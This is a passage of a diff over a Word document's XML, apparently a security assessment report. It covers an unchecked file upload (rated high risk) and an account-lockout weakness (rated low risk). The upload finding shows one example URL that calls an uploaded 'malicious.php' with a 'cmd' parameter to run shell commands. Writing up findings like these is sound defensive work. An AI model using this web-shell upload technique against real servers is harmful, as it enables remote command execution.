                             <w:dataBinding w:prefixMappings="xmlns:ns0='http://purl.org/dc/elements/1.1/' xmlns:ns1='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' " w:xpath="/ns1:coreProperties[1]/ns0:subject[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
                             <w:text/>
                           </w:sdtPr>
+                          <w:sdtEndPr/>
                           <w:sdtContent>
                             <w:p>
                               <w:pPr>
@@ -999,11 +710,266 @@
           <w:r>
             <w:br w:type="page"/>
           </w:r>
+          <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+            <mc:AlternateContent>
+              <mc:Choice Requires="wps">
+                <w:drawing>
+                  <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251664384" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="13A90324" wp14:editId="55EA39E5">
+                    <wp:simplePos x="0" y="0"/>
+                    <wp:positionH relativeFrom="page">
+                      <wp:posOffset>2857500</wp:posOffset>
+                    </wp:positionH>
+                    <wp:positionV relativeFrom="page">
+                      <wp:posOffset>8229600</wp:posOffset>
+                    </wp:positionV>
+                    <wp:extent cx="4685030" cy="914400"/>
+                    <wp:effectExtent l="0" t="0" r="0" b="8255"/>
+                    <wp:wrapSquare wrapText="bothSides"/>
+                    <wp:docPr id="152" name="Text Box 152"/>
+                    <wp:cNvGraphicFramePr/>
+                    <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                      <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                        <wps:wsp>
+                          <wps:cNvSpPr txBox="1"/>
+                          <wps:spPr>
+                            <a:xfrm>
+                              <a:off x="0" y="0"/>
+                              <a:ext cx="4685030" cy="914400"/>
+                            </a:xfrm>
+                            <a:prstGeom prst="rect">
+                              <a:avLst/>
+                            </a:prstGeom>
+                            <a:noFill/>
+                            <a:ln w="6350">
+                              <a:noFill/>
+                            </a:ln>
+                            <a:effectLst/>
+                          </wps:spPr>
+                          <wps:style>
+                            <a:lnRef idx="0">
+                              <a:schemeClr val="accent1"/>
+                            </a:lnRef>
+                            <a:fillRef idx="0">
+                              <a:schemeClr val="accent1"/>
+                            </a:fillRef>
+                            <a:effectRef idx="0">
+                              <a:schemeClr val="accent1"/>
+                            </a:effectRef>
+                            <a:fontRef idx="minor">
+                              <a:schemeClr val="dk1"/>
+                            </a:fontRef>
+                          </wps:style>
+                          <wps:txbx>
+                            <w:txbxContent>
+                              <w:p>
+                                <w:pPr>
+                                  <w:jc w:val="right"/>
+                                </w:pPr>
+                                <w:sdt>
+                                  <w:sdtPr>
+                                    <w:id w:val="-1119831961"/>
+                                    <w15:appearance w15:val="hidden"/>
+                                  </w:sdtPr>
+                                  <w:sdtContent>
+                                    <w:proofErr w:type="spellStart"/>
+                                    <w:r>
+                                      <w:t>Radu</w:t>
+                                    </w:r>
+                                    <w:proofErr w:type="spellEnd"/>
+                                    <w:r>
+                                      <w:t xml:space="preserve"> </w:t>
+                                    </w:r>
+                                    <w:proofErr w:type="spellStart"/>
+                                    <w:r>
+                                      <w:t>Stoica</w:t>
+                                    </w:r>
+                                    <w:proofErr w:type="spellEnd"/>
+                                    <w:r>
+                                      <w:t xml:space="preserve">, Armin </w:t>
+                                    </w:r>
+                                    <w:proofErr w:type="spellStart"/>
+                                    <w:r>
+                                      <w:t>Roushan</w:t>
+                                    </w:r>
+                                    <w:proofErr w:type="spellEnd"/>
+                                    <w:r>
+                                      <w:t>, Jan-</w:t>
+                                    </w:r>
+                                    <w:proofErr w:type="spellStart"/>
+                                    <w:r>
+                                      <w:t>Niklas</w:t>
+                                    </w:r>
+                                    <w:proofErr w:type="spellEnd"/>
+                                    <w:r>
+                                      <w:t xml:space="preserve"> Schneider, Georgiana </w:t>
+                                    </w:r>
+                                    <w:proofErr w:type="spellStart"/>
+                                    <w:r>
+                                      <w:t>Manolache</w:t>
+                                    </w:r>
+                                    <w:proofErr w:type="spellEnd"/>
+                                    <w:r>
+                                      <w:t>, N</w:t>
+                                    </w:r>
+                                    <w:r>
+                                      <w:t xml:space="preserve">ena O’Driscoll, </w:t>
+                                    </w:r>
+                                    <w:proofErr w:type="spellStart"/>
+                                    <w:r>
+                                      <w:t>Raditya</w:t>
+                                    </w:r>
+                                    <w:proofErr w:type="spellEnd"/>
+                                    <w:r>
+                                      <w:t xml:space="preserve"> </w:t>
+                                    </w:r>
+                                    <w:proofErr w:type="spellStart"/>
+                                    <w:r>
+                                      <w:t>Pratama</w:t>
+                                    </w:r>
+                                    <w:proofErr w:type="spellEnd"/>
+                                  </w:sdtContent>
+                                </w:sdt>
+                              </w:p>
+                              <w:p>
+                                <w:pPr>
+                                  <w:pStyle w:val="NoSpacing"/>
+                                  <w:jc w:val="center"/>
+                                  <w:rPr>
+                                    <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
+                                    <w:sz w:val="18"/>
+                                    <w:szCs w:val="18"/>
+                                  </w:rPr>
+                                </w:pPr>
+                              </w:p>
+                            </w:txbxContent>
+                          </wps:txbx>
+                          <wps:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="1600200" tIns="0" rIns="685800" bIns="0" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="b" anchorCtr="0" forceAA="0" compatLnSpc="1">
+                            <a:prstTxWarp prst="textNoShape">
+                              <a:avLst/>
+                            </a:prstTxWarp>
+                            <a:noAutofit/>
+                          </wps:bodyPr>
+                        </wps:wsp>
+                      </a:graphicData>
+                    </a:graphic>
+                    <wp14:sizeRelH relativeFrom="page">
+                      <wp14:pctWidth>0</wp14:pctWidth>
+                    </wp14:sizeRelH>
+                    <wp14:sizeRelV relativeFrom="page">
+                      <wp14:pctHeight>9200</wp14:pctHeight>
+                    </wp14:sizeRelV>
+                  </wp:anchor>
+                </w:drawing>
+              </mc:Choice>
+              <mc:Fallback>
+                <w:pict>
+                  <v:shape w14:anchorId="13A90324" id="Text Box 152" o:spid="_x0000_s1028" type="#_x0000_t202" style="position:absolute;margin-left:225pt;margin-top:9in;width:368.9pt;height:1in;z-index:251664384;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:92;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:page;mso-position-vertical:absolute;mso-position-vertical-relative:page;mso-width-percent:0;mso-height-percent:92;mso-width-relative:page;mso-height-relative:page;v-text-anchor:bottom" o:gfxdata="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" filled="f" stroked="f" strokeweight=".5pt">
+                    <v:textbox inset="126pt,0,54pt,0">
+                      <w:txbxContent>
+                        <w:p>
+                          <w:pPr>
+                            <w:jc w:val="right"/>
+                          </w:pPr>
+                          <w:sdt>
+                            <w:sdtPr>
+                              <w:id w:val="-1119831961"/>
+                              <w15:appearance w15:val="hidden"/>
+                            </w:sdtPr>
+                            <w:sdtContent>
+                              <w:proofErr w:type="spellStart"/>
+                              <w:r>
+                                <w:t>Radu</w:t>
+                              </w:r>
+                              <w:proofErr w:type="spellEnd"/>
+                              <w:r>
+                                <w:t xml:space="preserve"> </w:t>
+                              </w:r>
+                              <w:proofErr w:type="spellStart"/>
+                              <w:r>
+                                <w:t>Stoica</w:t>
+                              </w:r>
+                              <w:proofErr w:type="spellEnd"/>
+                              <w:r>
+                                <w:t xml:space="preserve">, Armin </w:t>
+                              </w:r>
+                              <w:proofErr w:type="spellStart"/>
+                              <w:r>
+                                <w:t>Roushan</w:t>
+                              </w:r>
+                              <w:proofErr w:type="spellEnd"/>
+                              <w:r>
+                                <w:t>, Jan-</w:t>
+                              </w:r>
+                              <w:proofErr w:type="spellStart"/>
+                              <w:r>
+                                <w:t>Niklas</w:t>
+                              </w:r>
+                              <w:proofErr w:type="spellEnd"/>
+                              <w:r>
+                                <w:t xml:space="preserve"> Schneider, Georgiana </w:t>
+                              </w:r>
+                              <w:proofErr w:type="spellStart"/>
+                              <w:r>
+                                <w:t>Manolache</w:t>
+                              </w:r>
+                              <w:proofErr w:type="spellEnd"/>
+                              <w:r>
+                                <w:t>, N</w:t>
+                              </w:r>
+                              <w:r>
+                                <w:t xml:space="preserve">ena O’Driscoll, </w:t>
+                              </w:r>
+                              <w:proofErr w:type="spellStart"/>
+                              <w:r>
+                                <w:t>Raditya</w:t>
+                              </w:r>
+                              <w:proofErr w:type="spellEnd"/>
+                              <w:r>
+                                <w:t xml:space="preserve"> </w:t>
+                              </w:r>
+                              <w:proofErr w:type="spellStart"/>
+                              <w:r>
+                                <w:t>Pratama</w:t>
+                              </w:r>
+                              <w:proofErr w:type="spellEnd"/>
+                            </w:sdtContent>
+                          </w:sdt>
+                        </w:p>
+                        <w:p>
+                          <w:pPr>
+                            <w:pStyle w:val="NoSpacing"/>
+                            <w:jc w:val="center"/>
+                            <w:rPr>
+                              <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
+                              <w:sz w:val="18"/>
+                              <w:szCs w:val="18"/>
+                            </w:rPr>
+                          </w:pPr>
+                        </w:p>
+                      </w:txbxContent>
+                    </v:textbox>
+                    <w10:wrap type="square" anchorx="page" anchory="page"/>
+                  </v:shape>
+                </w:pict>
+              </mc:Fallback>
+            </mc:AlternateContent>
+          </w:r>
         </w:p>
+        <w:bookmarkEnd w:id="0" w:displacedByCustomXml="next"/>
       </w:sdtContent>
     </w:sdt>
     <w:sdt>
       <w:sdtPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
         <w:id w:val="646629325"/>
         <w:docPartObj>
           <w:docPartGallery w:val="Table of Contents"/>
@@ -1012,13 +978,9 @@
       </w:sdtPr>
       <w:sdtEndPr>
         <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:b/>
           <w:bCs/>
           <w:noProof/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
         </w:rPr>
       </w:sdtEndPr>
       <w:sdtContent>
@@ -1037,6 +999,7 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
             </w:rPr>
           </w:pPr>
@@ -1049,7 +1012,7 @@
           <w:r>
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
-          <w:hyperlink w:anchor="_Toc464122883" w:history="1">
+          <w:hyperlink w:anchor="_Toc464383299" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1076,7 +1039,76 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc464122883 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc464383299 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>2</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc464383300" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Disabling login</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc464383300 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1138,7 +1170,7 @@
           <w:noProof/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_Toc464122883"/>
+      <w:bookmarkStart w:id="1" w:name="_Toc464383299"/>
       <w:r>
         <w:rPr>
           <w:noProof/>
@@ -1146,7 +1178,18 @@
         <w:lastRenderedPageBreak/>
         <w:t>File uploading</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="0"/>
+      <w:bookmarkEnd w:id="1"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Risk: High</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1158,15 +1201,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:t xml:space="preserve">The problem with the </w:t>
-      </w:r>
-      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="1"/>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>code is that there is no check regarding type of file being uploaded. Assuming that pictures/ is available in the web document root, an attacker could upload a file with the name:</w:t>
+        <w:t>The problem with the code is that there is no check regarding type of file being uploaded. Assuming that pictures/ is available in the web document root, an attacker could upload a file with the name:</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1191,21 +1226,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:t xml:space="preserve">Since this filename ends in </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>".php</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:t>" it can be executed by the web server. In the contents of this uploaded file, the attacker could use:</w:t>
+        <w:t>Since this filename ends in ".php" it can be executed by the web server. In the contents of this uploaded file, the attacker could use:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1274,47 +1295,7 @@
           <w:szCs w:val="19"/>
           <w:shd w:val="clear" w:color="auto" w:fill="EFEFEF"/>
         </w:rPr>
-        <w:t>http://</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
-          <w:color w:val="AA0000"/>
-          <w:sz w:val="19"/>
-          <w:szCs w:val="19"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="EFEFEF"/>
-        </w:rPr>
-        <w:t>serveraddress</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
-          <w:color w:val="AA0000"/>
-          <w:sz w:val="19"/>
-          <w:szCs w:val="19"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="EFEFEF"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
-          <w:color w:val="AA0000"/>
-          <w:sz w:val="19"/>
-          <w:szCs w:val="19"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="EFEFEF"/>
-        </w:rPr>
-        <w:t>uploads</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
-          <w:color w:val="AA0000"/>
-          <w:sz w:val="19"/>
-          <w:szCs w:val="19"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="EFEFEF"/>
-        </w:rPr>
-        <w:t>/malicious.php?cmd=ls%20-l</w:t>
+        <w:t>http://serveraddress/uploads/malicious.php?cmd=ls%20-l</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1323,7 +1304,7 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31F7C0C7" wp14:editId="2A93A849">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="360F9196" wp14:editId="0E50ED7B">
             <wp:extent cx="5943600" cy="3343275"/>
             <wp:effectExtent l="0" t="0" r="0" b="9525"/>
             <wp:docPr id="1" name="Picture 1"/>
@@ -1359,6 +1340,44 @@
         </w:drawing>
       </w:r>
     </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="2" w:name="_Toc464383300"/>
+      <w:r>
+        <w:t>Disabling login</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="2"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Risk: Low</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">An account allows for three login fails, after which the account is disabled. To recover the account, the owner must contact the administrator. This allows for an attacker to disable many accounts if he can brute force or guess the username </w:t>
+      </w:r>
+      <w:r>
+        <w:t>(like admin)</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
     <w:sectPr>
       <w:pgSz w:w="12240" w:h="15840"/>
       <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
@@ -1372,7 +1391,7 @@
 </file>
 
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
-<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se wp14">
+<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se wp14">
   <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="0C111D9F"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
@@ -1485,7 +1504,7 @@
       </w:pPr>
     </w:pPrDefault>
   </w:docDefaults>
-  <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="0" w:defUnhideWhenUsed="0" w:defQFormat="0" w:count="371">
+  <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="0" w:defUnhideWhenUsed="0" w:defQFormat="0" w:count="373">
     <w:lsdException w:name="Normal" w:uiPriority="0" w:qFormat="1"/>
     <w:lsdException w:name="heading 1" w:uiPriority="9" w:qFormat="1"/>
     <w:lsdException w:name="heading 2" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
@@ -1591,7 +1610,6 @@
     <w:lsdException w:name="HTML Sample" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="HTML Typewriter" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="HTML Variable" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Normal Table" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="annotation subject" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="No List" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Outline List 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
@@ -1637,11 +1655,9 @@
     <w:lsdException w:name="Table Subtle 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Table Subtle 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Table Web 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Web 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Table Web 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Balloon Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Table Grid" w:uiPriority="39"/>
-    <w:lsdException w:name="Table Theme" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Placeholder Text" w:semiHidden="1"/>
     <w:lsdException w:name="No Spacing" w:uiPriority="1" w:qFormat="1"/>
     <w:lsdException w:name="Light Shading" w:uiPriority="60"/>
@@ -1857,6 +1873,8 @@
     <w:lsdException w:name="List Table 5 Dark Accent 6" w:uiPriority="50"/>
     <w:lsdException w:name="List Table 6 Colorful Accent 6" w:uiPriority="51"/>
     <w:lsdException w:name="List Table 7 Colorful Accent 6" w:uiPriority="52"/>
+    <w:lsdException w:name="Mention" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Smart Hyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
   </w:latentStyles>
   <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
     <w:name w:val="Normal"/>
@@ -1903,6 +1921,28 @@
       <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
       <w:sz w:val="26"/>
       <w:szCs w:val="26"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Heading3">
+    <w:name w:val="heading 3"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
+    <w:link w:val="Heading3Char"/>
+    <w:uiPriority w:val="9"/>
+    <w:unhideWhenUsed/>
+    <w:qFormat/>
+    <w:rsid w:val="00407396"/>
+    <w:pPr>
+      <w:keepNext/>
+      <w:keepLines/>
+      <w:spacing w:before="40" w:after="0"/>
+      <w:outlineLvl w:val="2"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:color w:val="1F4D78" w:themeColor="accent1" w:themeShade="7F"/>
+      <w:sz w:val="24"/>
+      <w:szCs w:val="24"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
@@ -2015,6 +2055,19 @@
     <w:rPr>
       <w:color w:val="0563C1" w:themeColor="hyperlink"/>
       <w:u w:val="single"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
+    <w:name w:val="Heading 3 Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="Heading3"/>
+    <w:uiPriority w:val="9"/>
+    <w:rsid w:val="00407396"/>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:color w:val="1F4D78" w:themeColor="accent1" w:themeShade="7F"/>
+      <w:sz w:val="24"/>
+      <w:szCs w:val="24"/>
     </w:rPr>
   </w:style>
 </w:styles>
@@ -2286,7 +2339,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{16BA9E90-FB82-46C0-8D8C-86169E278E1B}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{0DDEFD0B-654D-4843-AC08-24E9DD43E8D7}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>
